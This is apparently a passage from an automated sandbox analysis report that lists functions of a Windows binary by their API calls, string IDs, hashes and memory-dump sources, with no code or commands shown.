                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 136442275-0
                                                                                                                  • Opcode ID: 50320f73fac894af12293c8715745953a6fd4e6be30b94de0e4c9fbfd317fb57
                                                                                                                  • Instruction ID: 91e987d86013fa238e4c3489d6df41e3df3fb69aa511c7175f82159c7c2ee1cb
                                                                                                                  • Opcode Fuzzy Hash: 50320f73fac894af12293c8715745953a6fd4e6be30b94de0e4c9fbfd317fb57
                                                                                                                  • Instruction Fuzzy Hash: F141EBB690422CAADF21EB50CC55EDE73BCEB48310F5041E6B519A2051EA71ABD8CFB0
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00D784E5
                                                                                                                  • __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D92177: _xtow@16.LIBCMT ref: 00D92198
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                  • Opcode ID: 69922065cbb33c90f727ae45c6a463db8acb1ba9ad14760375a742af7032c1c1
                                                                                                                  • Instruction ID: 64ccfafb72089f77e8b584cabeb734053e5ba0abffcde507c080200ba14a1cb6
                                                                                                                  • Opcode Fuzzy Hash: 69922065cbb33c90f727ae45c6a463db8acb1ba9ad14760375a742af7032c1c1
                                                                                                                  • Instruction Fuzzy Hash: 4641F331600705ABDB24EF38E841A6A77E9FB44304F28846EE589D7185FA71DA41DB30
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00D95CCA
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95D63
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95D99
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00D95DB6
                                                                                                                  • __allrem.LIBCMT ref: 00D95E0C
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E28
                                                                                                                  • __allrem.LIBCMT ref: 00D95E3F
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E5D
                                                                                                                  • __allrem.LIBCMT ref: 00D95E74
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D95E92
                                                                                                                  • __invoke_watson.LIBCMT ref: 00D95F03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 384356119-0
                                                                                                                  • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                  • Instruction ID: 1b41b42095bed11d9632fcef6d454809472265b4264879f2a3084c10076baac9
                                                                                                                  • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                  • Instruction Fuzzy Hash: 6E710871A01B16ABDF159F7DDC81BAAB3A8EF01724F144139F814D7685E770DA408BB0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5816
                                                                                                                  • GetMenuItemInfoW.USER32(00E318F0,000000FF,00000000,00000030), ref: 00DB5877
                                                                                                                  • SetMenuItemInfoW.USER32(00E318F0,00000004,00000000,00000030), ref: 00DB58AD
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00DB58BF
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00DB5903
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00DB591F
                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00DB5949
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00DB598E
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DB59D4
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB59E8
                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB5A09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4176008265-0
                                                                                                                  • Opcode ID: efb1e10abdeca551f9da3c7e72f726925c9afd5370054a135d6ea97ea898f988
                                                                                                                  • Instruction ID: 374422c6ddf2e737f484097060f04960105ca4bacfa74d8315ac42600c8cbdc2
                                                                                                                  • Opcode Fuzzy Hash: efb1e10abdeca551f9da3c7e72f726925c9afd5370054a135d6ea97ea898f988
                                                                                                                  • Instruction Fuzzy Hash: 7F616974900689EFDF11CFA4E888BFE7BBAEB05358F184159E442A7259D771AD05CB30
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DD9AA5
                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DD9AA8
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD9ACC
                                                                                                                  • _memset.LIBCMT ref: 00DD9ADD
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DD9AEF
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DD9B67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 830647256-0
                                                                                                                  • Opcode ID: a8dbf4551961db7ed0aeb628c5f0b61cdf1ba7a2a4235e9cf192dbe2bee298b6
                                                                                                                  • Instruction ID: c6ae49696033bdce52e5e53daf89c76d6baadd8fd6c420e425d318be5e6e92b2
                                                                                                                  • Opcode Fuzzy Hash: a8dbf4551961db7ed0aeb628c5f0b61cdf1ba7a2a4235e9cf192dbe2bee298b6
                                                                                                                  • Instruction Fuzzy Hash: 83616C75A00208AFDB10DFA8CC95EEEBBB8EF09700F14419AFA15E7391D771A945DB60
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB3591
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00DB3612
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00DB362D
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00DB3647
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00DB365C
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00DB3674
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00DB3686
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00DB369E
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00DB36B0
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00DB36C8
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00DB36DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: f8f21bfb957462d3dc7473348b78b0dc57593f21397cc046948669e6655021f0
                                                                                                                  • Instruction ID: 32b92f11365b636359b0f51d84764717929a6d42846886f3adbca6fe4b07a41a
                                                                                                                  • Opcode Fuzzy Hash: f8f21bfb957462d3dc7473348b78b0dc57593f21397cc046948669e6655021f0
                                                                                                                  • Instruction Fuzzy Hash: 0F4180609087C9BDFF319B6488143F5BBE16B12344F4C8059D9C7463C2EAA49BC8DBB2
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00DAA2AA
                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00DAA2F5
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DAA307
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DAA327
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00DAA36A
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DAA37E
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DAA393
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00DAA3A0
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAA3A9
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DAA3BB
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAA3C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: d8d427a435cfefbbcab9771bc7bee498b85dd3163c493ac7f0fddf7a8d312e80
                                                                                                                  • Instruction ID: dbf6b9bb73e3365149c27e1850c7e1afccc503c5f0d3732def6b27bfa1175d1a
                                                                                                                  • Opcode Fuzzy Hash: d8d427a435cfefbbcab9771bc7bee498b85dd3163c493ac7f0fddf7a8d312e80
                                                                                                                  • Instruction Fuzzy Hash: A0412D71900219AFCB01DFE8D8849EEBBBAFF49314F008065E501E3251DB34AA45CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • CoInitialize.OLE32 ref: 00DCB298
                                                                                                                  • CoUninitialize.COMBASE ref: 00DCB2A3
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00DFD8FC,?), ref: 00DCB303
                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00DCB376
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB410
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                  • Opcode ID: 1a4dd4f20a1de41f8afd075f43ab2e13f47d48a32a9d44b07374b2453025705d
                                                                                                                  • Instruction ID: 14d4cb9650db5a81c18ba6aab90449f081b4e21b9d82d81f8f2b39c7836051bb
                                                                                                                  • Opcode Fuzzy Hash: 1a4dd4f20a1de41f8afd075f43ab2e13f47d48a32a9d44b07374b2453025705d
                                                                                                                  • Instruction Fuzzy Hash: 6D615870208312AFC710DF64C886F6AB7E9EF89724F04451EF9859B291D770E948CBB2
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00DC86F5
                                                                                                                  • inet_addr.WS2_32(?), ref: 00DC873A
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00DC8746
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00DC8754
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC87C4
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DC87DA
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DC884F
                                                                                                                  • WSACleanup.WS2_32 ref: 00DC8855
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: fe87e3201805ea764a65d6a52bde86b0fd9df9b507aaf0ce781f5e17aa7e1dde
                                                                                                                  • Instruction ID: ec7380f1a282f776bf6c5fbfbe412c7a1d9dfbbe097d3271d4e24f8d8b5f6d77
                                                                                                                  • Opcode Fuzzy Hash: fe87e3201805ea764a65d6a52bde86b0fd9df9b507aaf0ce781f5e17aa7e1dde
                                                                                                                  • Instruction Fuzzy Hash: 66518031604302AFD721AF25DC45F6ABBE5EF48720F148529F59ADB2A1EB70E800DB71
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD9C68
                                                                                                                  • CreateMenu.USER32 ref: 00DD9C83
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00DD9C92
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD9D1F
                                                                                                                  • IsMenu.USER32(?), ref: 00DD9D35
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DD9D3F
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DD9D70
                                                                                                                  • DrawMenuBar.USER32 ref: 00DD9D7E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 176399719-4108050209
                                                                                                                  • Opcode ID: 5f70dbad450a90c581428bede387454472f281a87926d1489a222f87d3ea60a9
                                                                                                                  • Instruction ID: aa2e44aba6f28a834bc71de22678cd7c9d0084b17d9ebceab29a11c53116cbf5
                                                                                                                  • Opcode Fuzzy Hash: 5f70dbad450a90c581428bede387454472f281a87926d1489a222f87d3ea60a9
                                                                                                                  • Instruction Fuzzy Hash: B2416879A00209EFDB24EF68D894BEABBB6FF49304F184029E945A7351D731A914CF60
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBEC1E
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DBEC94
                                                                                                                  • GetLastError.KERNEL32 ref: 00DBEC9E
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00DBED0B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: 309ca5d1d747c977d1a75811dfc8fd20dc67145c1572c8dc4bd772ca7135ac68
                                                                                                                  • Instruction ID: 5c4c512b0376d35854b2b0e129fab7744703696d759bdec6b45d8ed9c7fa184b
                                                                                                                  • Opcode Fuzzy Hash: 309ca5d1d747c977d1a75811dfc8fd20dc67145c1572c8dc4bd772ca7135ac68
                                                                                                                  • Instruction Fuzzy Hash: A331D035A00309EFC711EF69C849AEEBBB5EF44700F188016E506EB291EA71DA41CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00DAC782
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00DAC78D
                                                                                                                  • GetParent.USER32 ref: 00DAC7A9
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DAC7AC
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00DAC7B5
                                                                                                                  • GetParent.USER32(?), ref: 00DAC7D1
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DAC7D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                  • Opcode ID: 804a2e6f28a95db0bea97f22b69c1b1dc7c77a2e6b7ccd49d649acf109a57abf
                                                                                                                  • Instruction ID: 9c2d29595513e8cd708a4ec67f04f842f727e1cc0705b0fcd6b8c36dcc97022b
                                                                                                                  • Opcode Fuzzy Hash: 804a2e6f28a95db0bea97f22b69c1b1dc7c77a2e6b7ccd49d649acf109a57abf
                                                                                                                  • Instruction Fuzzy Hash: 1D21C174A00208BFCF05EB64CC86EBEB766EB46310F108115F562D72D1DB749815EB30
                                                                                                                  APIs
